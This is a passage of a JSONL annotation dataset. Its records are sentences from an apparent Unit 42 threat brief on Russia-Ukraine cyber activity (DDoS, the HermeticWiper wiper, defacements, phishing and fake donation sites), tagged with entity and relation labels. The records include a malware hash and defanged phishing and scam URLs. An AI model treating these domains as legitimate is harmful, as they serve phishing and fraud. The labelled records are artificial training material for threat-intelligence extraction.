ransomware is a threat such that focus needs to be placed solely around prevention.","entities":[],"relations":[],"Comments":[]} {"id":174,"text":"There is no effective solution for ransomware at the operating system level, as outlined above.","entities":[],"relations":[],"Comments":[]} {"id":175,"text":"And unlike other attacks, ransomware attacks can’t succeed “just a little.”","entities":[],"relations":[],"Comments":[]} {"id":176,"text":"In some cases, a single file lost is more than enough to count as a fully successful attack.","entities":[],"relations":[],"Comments":[]} {"id":177,"text":" In some ways, ransomware is a threat unlike any other.","entities":[],"relations":[],"Comments":[]} {"id":178,"text":"Its impact and scope are both broad and deep in ways that are unique.","entities":[],"relations":[],"Comments":[]} {"id":179,"text":"Because of that, from a risk assessment point of view, ransomware needs to be put in a class by itself – a class that acknowledges that the risks from a successful attack of any kind are very high.","entities":[],"relations":[],"Comments":[]} {"id":180,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":181,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":182,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":183,"text":"This post is also available in: 日本語 (Japanese) ","entities":[],"relations":[],"Comments":[]} {"id":184,"text":"Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially.","entities":[],"relations":[],"Comments":[]} {"id":185,"text":"Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced.","entities":[{"id":45851,"label":"TIME","start_offset":13,"end_offset":20},{"id":45852,"label":"attack-pattern","start_offset":34,"end_offset":70}],"relations":[],"Comments":[]} {"id":186,"text":"These attacks have continued over the past week, impacting both the Ukrainian government and banking institutions.","entities":[{"id":44612,"label":"identity","start_offset":68,"end_offset":113}],"relations":[],"Comments":[]} {"id":187,"text":"On Feb. 23, a new variant of wiper malware named HermeticWiper was discovered in Ukraine.","entities":[{"id":591,"label":"malware","start_offset":29,"end_offset":34},{"id":45853,"label":"TIME","start_offset":3,"end_offset":10},{"id":45855,"label":"malware","start_offset":49,"end_offset":62},{"id":45854,"label":"location","start_offset":81,"end_offset":88}],"relations":[{"id":123,"from_id":45855,"to_id":591,"type":"variant-of"},{"id":124,"from_id":45855,"to_id":45854,"type":"targets"}],"Comments":[]} {"id":188,"text":"Shortly after, a new round of website defacement attacks were also observed impacting Ukrainian government organizations.","entities":[{"id":45856,"label":"identity","start_offset":86,"end_offset":120},{"id":45857,"label":"attack-pattern","start_offset":30,"end_offset":48}],"relations":[],"Comments":[]} {"id":189,"text":" Consistent with our previous reporting on the topic, several western governments have issued recommendations for their populations to prepare for cyberattacks that could disrupt, disable or destroy critical infrastructure.","entities":[{"id":45858,"label":"identity","start_offset":62,"end_offset":81}],"relations":[],"Comments":[]} {"id":190,"text":"We have already observed an increase in Russian cyber activity, which we reported on in our initial Threat Brief published last month and our recent report on the Gamaredon group.","entities":[{"id":45859,"label":"threat-actor","start_offset":163,"end_offset":178},{"id":45860,"label":"location","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} {"id":191,"text":"Future attacks may target U.S. and Western European organizations in retaliation for increased sanctions or other political measures against the Russian government.","entities":[{"id":45862,"label":"location","start_offset":35,"end_offset":51},{"id":45863,"label":"identity","start_offset":35,"end_offset":65},{"id":45861,"label":"location","start_offset":26,"end_offset":30},{"id":45864,"label":"identity","start_offset":145,"end_offset":163}],"relations":[],"Comments":[]} {"id":192,"text":"We recommend that all organizations proactively prepare to defend against this potential threat.","entities":[],"relations":[],"Comments":[]} {"id":193,"text":" This post was substantially updated on Feb. 24 to add information on the recent DDoS attacks, HermeticWiper malware and website defacement; update our recommendations for how organizations should prepare for potential cyber impact; and provide additional details for our customers and clients on how we can help.","entities":[{"id":45866,"label":"TIME","start_offset":40,"end_offset":47},{"id":45867,"label":"attack-pattern","start_offset":81,"end_offset":93},{"id":45868,"label":"attack-pattern","start_offset":121,"end_offset":139},{"id":45865,"label":"malware","start_offset":95,"end_offset":108}],"relations":[],"Comments":[]} {"id":194,"text":"This post was substantially updated March 31 to add information on phishing and scam attacks, cybersquatting trends, fake donation websites, DoS attacks on Ukrainian news sites and distribution of malicious binaries.","entities":[{"id":45871,"label":"attack-pattern","start_offset":94,"end_offset":108},{"id":45872,"label":"attack-pattern","start_offset":117,"end_offset":139},{"id":45873,"label":"attack-pattern","start_offset":141,"end_offset":152},{"id":45869,"label":"TIME","start_offset":36,"end_offset":44},{"id":45874,"label":"identity","start_offset":156,"end_offset":176},{"id":45875,"label":"attack-pattern","start_offset":181,"end_offset":215},{"id":45870,"label":"attack-pattern","start_offset":67,"end_offset":92}],"relations":[{"id":127,"from_id":45872,"to_id":45874,"type":"duplicate-of"},{"id":129,"from_id":45875,"to_id":45874,"type":"targets"},{"id":128,"from_id":45873,"to_id":45874,"type":"targets"},{"id":126,"from_id":45871,"to_id":45874,"type":"targets"},{"id":125,"from_id":45870,"to_id":45874,"type":"targets"}],"Comments":[]} {"id":195,"text":" Full visualization of the techniques observed, relevant courses of action and indicators of compromise (IoCs) related to this report can be found in the Unit 42 ATOM viewer. We will continue to provide updates with new information and recommendations as they become available.","entities":[{"id":45780,"label":"SOFTWARE","start_offset":154,"end_offset":173}],"relations":[],"Comments":[]} {"id":196,"text":" DDoS Attacks Impacting Ukrainian Government and Banking Institutions HermeticWiper Malware Website Defacement Rise in Phishing and Scam Attacks Increase in Cybersquatting Trends Fake Donation Websites DoS Attacks on Ukrainian News Sites Distribution of Apps How Palo Alto Networks Is Working to Keep You Safe How You Should Prepare for an Increase in Cyberthreats Such as Wipers, DDoS, Website Defacement and Other Related Attacks How Unit 42 Threat Intelligence and Security Consulting Can Help Additional Cybersecurity Resources Indicators of Compromise","entities":[{"id":45877,"label":"attack-pattern","start_offset":1,"end_offset":13},{"id":45879,"label":"attack-pattern","start_offset":84,"end_offset":109},{"id":45885,"label":"attack-pattern","start_offset":238,"end_offset":258},{"id":45889,"label":"attack-pattern","start_offset":387,"end_offset":405},{"id":45891,"label":"identity","start_offset":436,"end_offset":443},{"id":45876,"label":"malware","start_offset":70,"end_offset":83},{"id":45878,"label":"identity","start_offset":24,"end_offset":69},{"id":45880,"label":"attack-pattern","start_offset":119,"end_offset":144},{"id":45881,"label":"attack-pattern","start_offset":157,"end_offset":171},{"id":45882,"label":"attack-pattern","start_offset":179,"end_offset":201},{"id":45883,"label":"attack-pattern","start_offset":202,"end_offset":213},{"id":45884,"label":"identity","start_offset":217,"end_offset":237},{"id":45886,"label":"identity","start_offset":263,"end_offset":281},{"id":45887,"label":"attack-pattern","start_offset":373,"end_offset":379},{"id":45888,"label":"attack-pattern","start_offset":381,"end_offset":385}],"relations":[{"id":130,"from_id":45877,"to_id":45878,"type":"targets"}],"Comments":[]} {"id":197,"text":"Appendix A: Cortex Xpanse: Identifying Assets That May Be Impacted by CISA’s Known Exploited Vulnerabilities","entities":[{"id":45892,"label":"SOFTWARE","start_offset":12,"end_offset":25},{"id":45893,"label":"identity","start_offset":70,"end_offset":75}],"relations":[],"Comments":[]} {"id":198,"text":"On Feb. 15, the Cyberpolice of Ukraine reported that residents were actively receiving fake SMS text messages.","entities":[{"id":45894,"label":"TIME","start_offset":3,"end_offset":10},{"id":44614,"label":"identity","start_offset":16,"end_offset":38},{"id":44615,"label":"attack-pattern","start_offset":77,"end_offset":109}],"relations":[],"Comments":[]} {"id":199,"text":"These messages were likely intended to cause alarm among the population, as they claimed that ATMs were malfunctioning.","entities":[],"relations":[],"Comments":[]} {"id":200,"text":" Shortly after the text messages were observed, several DDoS attacks occurred.","entities":[{"id":45895,"label":"attack-pattern","start_offset":56,"end_offset":68}],"relations":[],"Comments":[]} {"id":201,"text":"These attacks impacted Ukrainian government organizations including the Ministry of Defense, Ministry of Foreign Affairs, Armed Forces of Ukraine and the publicly funded broadcaster Ukrainian Radio.","entities":[{"id":44616,"label":"identity","start_offset":23,"end_offset":43},{"id":44617,"label":"identity","start_offset":72,"end_offset":91},{"id":44618,"label":"identity","start_offset":93,"end_offset":120},{"id":44619,"label":"identity","start_offset":122,"end_offset":145},{"id":44620,"label":"identity","start_offset":182,"end_offset":197}],"relations":[],"Comments":[]} {"id":202,"text":"Additionally, the attacks targeted two banking institutions, PrivatBank and Oschadbank.","entities":[{"id":45896,"label":"identity","start_offset":61,"end_offset":71},{"id":45897,"label":"identity","start_offset":76,"end_offset":86}],"relations":[],"Comments":[]} {"id":203,"text":"An initial investigation into the DDoS attacks suggested that Mirai and Meris bot networks may have been leveraged in the attacks.","entities":[{"id":45900,"label":"malware","start_offset":72,"end_offset":90},{"id":45898,"label":"attack-pattern","start_offset":34,"end_offset":46},{"id":45899,"label":"malware","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} {"id":204,"text":" On Feb. 18, both the United States and the United Kingdom attributed these DDoS attacks to Russia’s Main Intelligence Directorate (GRU). Over the past week, Ukraine has continued to observe a relatively constant flow of DDoS attacks targeting its government and financial institutions.","entities":[{"id":44621,"label":"identity","start_offset":22,"end_offset":35},{"id":44622,"label":"TIME","start_offset":4,"end_offset":11},{"id":44623,"label":"identity","start_offset":44,"end_offset":58},{"id":44624,"label":"attack-pattern","start_offset":76,"end_offset":80},{"id":44625,"label":"threat-actor","start_offset":92,"end_offset":136},{"id":44626,"label":"identity","start_offset":159,"end_offset":166},{"id":44627,"label":"attack-pattern","start_offset":222,"end_offset":234},{"id":44628,"label":"identity","start_offset":249,"end_offset":286}],"relations":[{"id":4,"from_id":44624,"to_id":44625,"type":"attributed-to"},{"id":131,"from_id":44627,"to_id":44628,"type":"targets"}],"Comments":[]} {"id":205,"text":"However, at this time, attribution for the ongoing attacks has not been established.","entities":[],"relations":[],"Comments":[]} {"id":206,"text":"The Ukrainian CERT did identify a post on RaidForums from a user named “Carzita” that suggested that additional actors may also be launching DDoS and defacement attacks for undisclosed reasons.","entities":[{"id":45901,"label":"identity","start_offset":4,"end_offset":18},{"id":45903,"label":"identity","start_offset":72,"end_offset":79},{"id":45902,"label":"identity","start_offset":42,"end_offset":52},{"id":45904,"label":"attack-pattern","start_offset":141,"end_offset":145},{"id":45905,"label":"attack-pattern","start_offset":150,"end_offset":168}],"relations":[],"Comments":[]} {"id":207,"text":"On Feb. 23, a malicious file named conhosts._exe (SHA256: 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591) was uploaded to a public malware repository from an organization in Kyiv, Ukraine.","entities":[{"id":678,"label":"SHA2","start_offset":58,"end_offset":122},{"id":44630,"label":"location","start_offset":192,"end_offset":205},{"id":44631,"label":"FILEPATH","start_offset":35,"end_offset":48},{"id":44632,"label":"TIME","start_offset":3,"end_offset":10}],"relations":[{"id":133,"from_id":678,"to_id":44631,"type":"indicates"}],"Comments":[]} {"id":208,"text":"This executable is a signed file with a valid signature from an organization named Hermetica Digital Ltd. This signing certificate has since been explicitly revoked by its issuer.","entities":[{"id":45906,"label":"identity","start_offset":83,"end_offset":104}],"relations":[],"Comments":[]} {"id":209,"text":"Upon execution, this file enumerates all files on a hard drive, wipes the partition info and then forces a system reboot, which predictably results in the following screen:","entities":[],"relations":[],"Comments":[]} {"id":210,"text":" Further analysis has confirmed that the malware accepts command-line arguments allowing an attacker to instruct the malware to sleep for a period of time or to shut down the system.","entities":[],"relations":[],"Comments":[]} {"id":211,"text":" Additionally the kernel module responsible for the actual wiping activity is from a legitimate application called EaseUS Partition Master.","entities":[{"id":45907,"label":"tools","start_offset":115,"end_offset":138}],"relations":[],"Comments":[]} {"id":212,"text":"This software is designed as free partition software that can reorganize disk space for better performance.","entities":[],"relations":[],"Comments":[]} {"id":213,"text":"In tracking this threat, early reports show that the malware has been deployed against a financial institution in Ukraine as well as two contractors in Latvia and Lithuania that provide services to the Ukrainian Government.","entities":[{"id":44633,"label":"location","start_offset":114,"end_offset":121},{"id":44634,"label":"identity","start_offset":202,"end_offset":222},{"id":44635,"label":"identity","start_offset":90,"end_offset":110},{"id":44636,"label":"location","start_offset":152,"end_offset":158},{"id":44637,"label":"location","start_offset":163,"end_offset":172},{"id":44638,"label":"malware","start_offset":53,"end_offset":60},{"id":44639,"label":"identity","start_offset":133,"end_offset":172}],"relations":[{"id":6,"from_id":44638,"to_id":44635,"type":"targets"},{"id":7,"from_id":44638,"to_id":44639,"type":"targets"}],"Comments":[]} {"id":214,"text":"Additionally, ESET researchers have warned that they found this malware installed across “hundreds of machines” in Ukraine.","entities":[{"id":45908,"label":"identity","start_offset":14,"end_offset":18},{"id":45909,"label":"location","start_offset":115,"end_offset":122}],"relations":[],"Comments":[]} {"id":215,"text":" Concurrent with the discovery of wiper malware, we also witnessed a second round of website defacements on Feb. 23.","entities":[{"id":45910,"label":"TIME","start_offset":108,"end_offset":115},{"id":45911,"label":"attack-pattern","start_offset":85,"end_offset":104}],"relations":[],"Comments":[]} {"id":216,"text":"These attacks appear to have copied the messaging template observed in attacks exploiting the OctoberCMS vulnerability a month earlier on Jan.14, while adding a .onion web address and a message in red font that translates to, “Do you need proof, see the link at the end.” ","entities":[{"id":44640,"label":"vulnerability","start_offset":94,"end_offset":118},{"id":44641,"label":"TIME","start_offset":138,"end_offset":144}],"relations":[],"Comments":[]} {"id":217,"text":"The .onion site links to an entity calling themselves “Free Civilian” and offering to sell databases containing the personal data of Ukrainian citizens.","entities":[],"relations":[],"Comments":[]} {"id":218,"text":"Over the past 24 hours, the list of entities on the leaks section has expanded to 48 gov.ua domains and one Ukranian company (motorsich[.]com) that builds engines for airplanes and helicopters.","entities":[{"id":45912,"label":"TIME","start_offset":5,"end_offset":22},{"id":45913,"label":"identity","start_offset":108,"end_offset":124},{"id":45914,"label":"DOMAIN","start_offset":126,"end_offset":141}],"relations":[],"Comments":[]} {"id":219,"text":" Our team analyzed the larger trends regarding Ukraine-related phishing and scam URLs detected by Advanced URL Filtering.","entities":[{"id":715,"label":"attack-pattern","start_offset":63,"end_offset":71},{"id":44643,"label":"attack-pattern","start_offset":76,"end_offset":85}],"relations":[],"Comments":[]} {"id":220,"text":"We noticed an overall increase in the detection of websites that host phishing and scam URLs on domains using Ukraine-related TLDs such as gov.ua and com.ua, or containing popular Ukraine-related keywords such as \"ukraine\" and \"ukrainian\".","entities":[{"id":45915,"label":"attack-pattern","start_offset":70,"end_offset":78},{"id":45918,"label":"location","start_offset":214,"end_offset":221},{"id":45919,"label":"location","start_offset":110,"end_offset":117}],"relations":[],"Comments":[]} {"id":221,"text":"This trend correlates with an increase in Google searches for terms like \"Ukraine aid.\"","entities":[{"id":45916,"label":"SOFTWARE","start_offset":42,"end_offset":48}],"relations":[],"Comments":[]} {"id":223,"text":" From January to late February, it appears that the number of Ukraine-related phishing and scam sites largely followed a similar trend as Ukraine-related internet searches; however, the number of phishing and scam sites has continued to rise through mid-late March as the situation remains ongoing.","entities":[{"id":737,"label":"attack-pattern","start_offset":78,"end_offset":86},{"id":741,"label":"attack-pattern","start_offset":196,"end_offset":204},{"id":45920,"label":"TIME","start_offset":6,"end_offset":13},{"id":45925,"label":"attack-pattern","start_offset":209,"end_offset":219},{"id":45921,"label":"TIME","start_offset":17,"end_offset":30},{"id":45922,"label":"location","start_offset":62,"end_offset":69},{"id":45923,"label":"location","start_offset":138,"end_offset":145}],"relations":[],"Comments":[]} {"id":224,"text":"Figure 8 shows that the number of Ukraine-related phishing\/scam sites is currently continuing to rise about a month after the “Ukraine aid” search term started trending in Google search.","entities":[{"id":747,"label":"attack-pattern","start_offset":50,"end_offset":58},{"id":45924,"label":"attack-pattern","start_offset":59,"end_offset":69},{"id":45926,"label":"location","start_offset":34,"end_offset":41},{"id":45927,"label":"SOFTWARE","start_offset":172,"end_offset":178}],"relations":[],"Comments":[]} {"id":225,"text":" Among these phishing and scam URLs, we found a targeted phishing attack.","entities":[{"id":751,"label":"attack-pattern","start_offset":14,"end_offset":22},{"id":44645,"label":"attack-pattern","start_offset":27,"end_offset":36},{"id":44646,"label":"attack-pattern","start_offset":49,"end_offset":73}],"relations":[],"Comments":[]} {"id":226,"text":"On March 16 while ingesting a third-party data feed, our in-house machine learning models detected a phishing webpage targeting a Ukrainian state administration employee.","entities":[{"id":756,"label":"attack-pattern","start_offset":101,"end_offset":109},{"id":45928,"label":"TIME","start_offset":3,"end_offset":11},{"id":45929,"label":"identity","start_offset":130,"end_offset":169}],"relations":[{"id":134,"from_id":756,"to_id":45929,"type":"targets"}],"Comments":[]} {"id":227,"text":"The webpage is imitating a popular cloud file storage site.","entities":[],"relations":[],"Comments":[]} {"id":228,"text":"Upon visiting the webpage, the “Username” field is pre-","entities":[],"relations":[],"Comments":[]} {"id":229,"text":"populated with the targeted employee’s email address, and the user is then prompted to enter in their password in order to view a sensitive document as shown in Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":230,"text":" Figure 9. hxxps:\/\/startrackzm[.]com\/wap-admin\/ONE-DRIVE\/one%20d%20%20no%20auto.php?Email=REDACTED@REDACTED.gov.ua.","entities":[{"id":45930,"label":"URL","start_offset":11,"end_offset":114}],"relations":[],"Comments":[]} {"id":231,"text":"A phishing webpage targeting a Ukrainian state administration employee, detected by our in-house machine learning models on March 16.Our teams at Palo Alto Networks are actively monitoring the phishing landscape surrounding Ukraine-related URLs and are sharing this threat intelligence with relevant authorities in Ukraine and internationally.","entities":[{"id":765,"label":"attack-pattern","start_offset":2,"end_offset":10},{"id":771,"label":"attack-pattern","start_offset":193,"end_offset":201},{"id":44647,"label":"identity","start_offset":31,"end_offset":70},{"id":44648,"label":"TIME","start_offset":124,"end_offset":132},{"id":44649,"label":"identity","start_offset":146,"end_offset":164},{"id":44650,"label":"location","start_offset":315,"end_offset":322}],"relations":[{"id":135,"from_id":765,"to_id":44647,"type":"targets"},{"id":136,"from_id":771,"to_id":44650,"type":"targets"}],"Comments":[]} {"id":232,"text":"We are also sharing a list of IoCs that were detected as phishing and scam URLs.","entities":[{"id":45931,"label":"attack-pattern","start_offset":57,"end_offset":65},{"id":45932,"label":"attack-pattern","start_offset":70,"end_offset":79}],"relations":[],"Comments":[]} {"id":233,"text":"Palo Alto Networks customers who subscribe to Advanced URL Filtering are already protected from these IoCs.","entities":[{"id":45933,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":234,"text":" We monitored a list of 50 legitimate Ukraine-related domains (e.g., popular news and donation websites) and keywords (e.g., Ukraine, refugee) as targets for cybersquatting.","entities":[{"id":45781,"label":"location","start_offset":125,"end_offset":132},{"id":45934,"label":"location","start_offset":38,"end_offset":45},{"id":44651,"label":"attack-pattern","start_offset":158,"end_offset":172}],"relations":[{"id":137,"from_id":44651,"to_id":45781,"type":"targets"}],"Comments":[]} {"id":235,"text":"We detected 11,637 cybersquatting newly registered domains (NRDs) during February and March.","entities":[{"id":45935,"label":"TIME","start_offset":73,"end_offset":81},{"id":45936,"label":"TIME","start_offset":86,"end_offset":91}],"relations":[],"Comments":[]} {"id":236,"text":"In particular, we noticed a sharp increase in the number of cybersquatting domains that were registered close to Feb. 24, as shown in Figure 10 below.","entities":[{"id":45937,"label":"attack-pattern","start_offset":60,"end_offset":74},{"id":45938,"label":"TIME","start_offset":113,"end_offset":120}],"relations":[],"Comments":[]} {"id":237,"text":" We manually analyzed a sample set of these cybersquatting domains.","entities":[{"id":45782,"label":"attack-pattern","start_offset":44,"end_offset":58}],"relations":[],"Comments":[]} {"id":238,"text":"Below we share some interesting case studies.","entities":[],"relations":[],"Comments":[]} {"id":240,"text":"A detailed analysis of these domains revealed that many of them are fake.","entities":[],"relations":[],"Comments":[]} {"id":241,"text":"These donation websites provide little to no information about the associated organization and distribution of funds.","entities":[],"relations":[],"Comments":[]} {"id":242,"text":"Many of these websites use cryptocurrency wallets (e.g., BTC, ETH) to accept payment (likely because these wallets are easy to set up and require no verification). We also find that some websites are mimicking popular donation websites or organizations to trick users into paying them money.","entities":[{"id":45940,"label":"SOFTWARE","start_offset":57,"end_offset":60},{"id":45941,"label":"SOFTWARE","start_offset":62,"end_offset":65}],"relations":[],"Comments":[]} {"id":243,"text":"We show some examples in Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":244,"text":"For instance, donatetoukraine[.]com is pretending to be associated with the popular Come Back Alive campaign.","entities":[{"id":45942,"label":"DOMAIN","start_offset":14,"end_offset":35},{"id":45943,"label":"campaign","start_offset":84,"end_offset":108}],"relations":[{"id":138,"from_id":45942,"to_id":45943,"type":"related-to"}],"Comments":[]} {"id":245,"text":"While the banking information shared on the donation website matches the original campaign website, we confirmed that the BTC wallet address is different from the actual.","entities":[{"id":45944,"label":"SOFTWARE","start_offset":122,"end_offset":132}],"relations":[],"Comments":[]} {"id":246,"text":" We found a cybersquatting domain – save-russia[.]today – that is launching DoS attacks on Ukrainian news sites.","entities":[{"id":44652,"label":"attack-pattern","start_offset":13,"end_offset":27},{"id":44653,"label":"DOMAIN","start_offset":37,"end_offset":56},{"id":44654,"label":"attack-pattern","start_offset":77,"end_offset":88},{"id":44655,"label":"identity","start_offset":92,"end_offset":112}],"relations":[{"id":8,"from_id":44653,"to_id":44655,"type":"targets"},{"id":112,"from_id":44652,"to_id":44653,"type":"uses"},{"id":113,"from_id":44654,"to_id":44653,"type":"uses"}],"Comments":[]} {"id":247,"text":"Once a user opens the website in the browser, it starts making requests to various Ukrainian news sites and lists the number of requests made to each new site on the home page, as shown in Figure 12 below.","entities":[{"id":45945,"label":"identity","start_offset":83,"end_offset":103}],"relations":[],"Comments":[]} {"id":248,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":249,"text":"A cybersquatting domain save-russia[.]today is launching DoS attacks on Ukrainian news sites.","entities":[{"id":44656,"label":"attack-pattern","start_offset":2,"end_offset":16},{"id":44657,"label":"DOMAIN","start_offset":24,"end_offset":43},{"id":44658,"label":"attack-pattern","start_offset":57,"end_offset":68},{"id":44659,"label":"identity","start_offset":72,"end_offset":92}],"relations":[{"id":9,"from_id":44658,"to_id":44659,"type":"targets"},{"id":114,"from_id":44656,"to_id":44657,"type":"uses"},{"id":115,"from_id":44658,"to_id":44657,"type":"uses"}],"Comments":[]} {"id":250,"text":"We strongly recommend that users be alert to the possibility of cybersquatting domains.","entities":[{"id":45946,"label":"attack-pattern","start_offset":64,"end_offset":78}],"relations":[],"Comments":[]} {"id":251,"text":"In particular, fake donation websites mimicking popular websites can be misleading, as described earlier.","entities":[{"id":45948,"label":"attack-pattern","start_offset":38,"end_offset":64},{"id":45947,"label":"attack-pattern","start_offset":15,"end_offset":37}],"relations":[],"Comments":[]} {"id":252,"text":"Before donating money, we recommend checking whether the website is referenced and shared by the official charity or government organization.","entities":[],"relations":[],"Comments":[]} {"id":253,"text":"Our teams at Palo Alto Networks will continue monitoring domain squatting attacks and work to protect customers against them.","entities":[{"id":45949,"label":"identity","start_offset":13,"end_offset":31},{"id":45950,"label":"attack-pattern","start_offset":57,"end_offset":81}],"relations":[],"Comments":[]} {"id":255,"text":" We detected campaigns of fake downloads where threat actors have set up web pages to host malicious binaries.","entities":[{"id":44660,"label":"attack-pattern","start_offset":26,"end_offset":40},{"id":44661,"label":"attack-pattern","start_offset":86,"end_offset":109}],"relations":[],"Comments":[]} {"id":257,"text":"Most of these web pages show malicious binaries as popular browsers or communication apps in order to deceive users.","entities":[],"relations":[],"Comments":[]} {"id":258,"text":"For example, we detected a website that was distributing a malicious binary by masquerading as a popular global communication app targeting users in Ukraine.","entities":[{"id":847,"label":"attack-pattern","start_offset":79,"end_offset":91},{"id":44662,"label":"location","start_offset":149,"end_offset":156},{"id":44663,"label":"attack-pattern","start_offset":44,"end_offset":75}],"relations":[],"Comments":[]} {"id":260,"text":"Note that Palo Alto Networks customers receive protections against such domains from the Next-Generation Firewall via Advanced URL Filtering, DNS Security and WildFire URL Analysis subscriptions.","entities":[{"id":45955,"label":"SOFTWARE","start_offset":159,"end_offset":167},{"id":45954,"label":"identity","start_offset":10,"end_offset":28}],"relations":[],"Comments":[]} {"id":261,"text":"We also found that these fake download campaigns rotate domains to distribute the same malicious binaries.","entities":[{"id":44664,"label":"attack-pattern","start_offset":25,"end_offset":38},{"id":44665,"label":"attack-pattern","start_offset":87,"end_offset":105}],"relations":[],"Comments":[]} {"id":262,"text":"For example, we detected two domains distributing the same malicious binary where one domain was impersonating a popular, widely used video conferencing application and the other a widely used internet browser.","entities":[],"relations":[],"Comments":[]} {"id":264,"text":"Our teams at Palo Alto Networks will continue to monitor and work to protect our customers against such attacks.","entities":[{"id":44666,"label":"identity","start_offset":13,"end_offset":31}],"relations":[],"Comments":[]} {"id":267,"text":" Consistent with our previous reporting on the situation, Unit 42 continues to lead a company-wide effort to collect, evaluate and disseminate the latest intelligence on cyber activity related to Russia and Ukraine.","entities":[{"id":45785,"label":"identity","start_offset":58,"end_offset":65},{"id":45783,"label":"location","start_offset":196,"end_offset":202},{"id":45784,"label":"location","start_offset":207,"end_offset":214}],"relations":[],"Comments":[]} {"id":268,"text":"We are actively collaborating with our partners in industry and governments to share our analysis and findings based on our global threat telemetry network.","entities":[],"relations":[],"Comments":[]} {"id":269,"text":" These efforts have enabled us to make near-daily updates to our platform to ensure our customers have the best protection possible.","entities":[],"relations":[],"Comments":[]} {"id":270,"text":"This includes blocking hundreds of domain names, IP addresses and URLs for our customers related to newly discovered attacks.","entities":[],"relations":[],"Comments":[]} {"id":271,"text":"We’ve updated and added signatures to the WildFire analysis and Cortex XDR Prevent and Pro products to block newly discovered vulnerabilities and malware including HermeticWiper.","entities":[{"id":45961,"label":"SOFTWARE","start_offset":42,"end_offset":50},{"id":45960,"label":"malware","start_offset":164,"end_offset":177},{"id":45962,"label":"SOFTWARE","start_offset":64,"end_offset":90}],"relations":[],"Comments":[]} {"id":272,"text":"Read more about Cortex XDR protections.","entities":[{"id":45963,"label":"SOFTWARE","start_offset":16,"end_offset":26}],"relations":[],"Comments":[]} {"id":273,"text":"Our Threat Prevention and Web Application and API Security products added coverage for the OctoberCMS vulnerability exploited in the WhisperGate attacks, and we released an XSOAR Playbook to help organizations hunt for this threat.","entities":[{"id":906,"label":"malware","start_offset":133,"end_offset":144},{"id":44671,"label":"campaign","start_offset":133,"end_offset":152},{"id":44672,"label":"SOFTWARE","start_offset":173,"end_offset":178},{"id":44670,"label":"vulnerability","start_offset":91,"end_offset":115}],"relations":[{"id":10,"from_id":44671,"to_id":44670,"type":"delivers"}],"Comments":[]} {"id":274,"text":"Cortex Xpanse can assist with understanding and managing your organization’s attack surface as well as identifying vulnerable resources.","entities":[{"id":45964,"label":"SOFTWARE","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":275,"text":" We have released public reports on the WhisperGate attacks and the infrastructure and tactics used by the Gamaredon group.","entities":[{"id":45965,"label":"malware","start_offset":40,"end_offset":51},{"id":45966,"label":"threat-actor","start_offset":107,"end_offset":122}],"relations":[],"Comments":[]} {"id":276,"text":"On the Unit 42 website, you will also find a free ATOM which contains a structured mapping of the Gamaredon group’s tactics aligned to MITRE’s ATT&CK framework.","entities":[{"id":44673,"label":"identity","start_offset":7,"end_offset":14},{"id":44674,"label":"threat-actor","start_offset":98,"end_offset":107},{"id":44675,"label":"SOFTWARE","start_offset":135,"end_offset":159},{"id":44676,"label":"SOFTWARE","start_offset":50,"end_offset":54}],"relations":[],"Comments":[]} {"id":277,"text":" As the situation continues to develop, we’ll continue to update our blog with the latest information.","entities":[],"relations":[],"Comments":[]} {"id":278,"text":" There is no single action you can take to protect your organization against this threat.","entities":[],"relations":[],"Comments":[]} {"id":279,"text":"Unlike a new malware family or vulnerability in the wild, the attacks we expect could come in many forms.","entities":[],"relations":[],"Comments":[]} {"id":280,"text":"Several western governments have proposed broad recommendations focused on technical hygiene.","entities":[{"id":45967,"label":"identity","start_offset":8,"end_offset":27}],"relations":[],"Comments":[]} {"id":281,"text":"We consider these appropriate given the variety of tactics that Russian actors have used in the past.","entities":[{"id":45968,"label":"identity","start_offset":64,"end_offset":78}],"relations":[],"Comments":[]} {"id":282,"text":" We recommend organizations prioritize actions in the following four areas: There is no way to know for certain what shape an attack may take, but taking these steps will help provide broad protection against what we expect to come.","entities":[],"relations":[],"Comments":[]} {"id":283,"text":" Unit 42, the threat intelligence and security consulting arm of Palo Alto Networks, has a team of experts who can help your organization assess and test your security controls with proactive assessments and incident simulation services.","entities":[{"id":45970,"label":"identity","start_offset":1,"end_offset":8},{"id":45971,"label":"identity","start_offset":65,"end_offset":83}],"relations":[],"Comments":[]} {"id":284,"text":"Because of the likelihood of ransomware attacks – or destructive attacks that pose as ransomware – it may be beneficial to focus on preparing in this area, particularly ensuring backup and recovery plans are in place.","entities":[],"relations":[],"Comments":[]} {"id":285,"text":"We have distilled the knowledge we’ve gained from responding to hundreds of ransomware incidents into our Ransomware Readiness Assessment offering, which is designed to help organizations strengthen their processes and technology to mitigate threats like the ones we expect in the coming days and weeks.","entities":[],"relations":[],"Comments":[]} {"id":286,"text":" If you think you may have been compromised by wiper attacks, Gamaredon, DDoS attacks or other cyber activity related to Russia-Ukraine, or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.","entities":[{"id":45972,"label":"threat-actor","start_offset":62,"end_offset":71},{"id":45975,"label":"location","start_offset":325,"end_offset":330},{"id":45976,"label":"location","start_offset":301,"end_offset":305},{"id":45979,"label":"identity","start_offset":185,"end_offset":215},{"id":45973,"label":"attack-pattern","start_offset":73,"end_offset":85},{"id":45974,"label":"location","start_offset":224,"end_offset":237},{"id":45977,"label":"location","start_offset":278,"end_offset":282},{"id":45980,"label":"attack-pattern","start_offset":47,"end_offset":60}],"relations":[],"Comments":[]} {"id":287,"text":" Threat Brief: Ongoing Russia and Ukraine Cyber Conflict 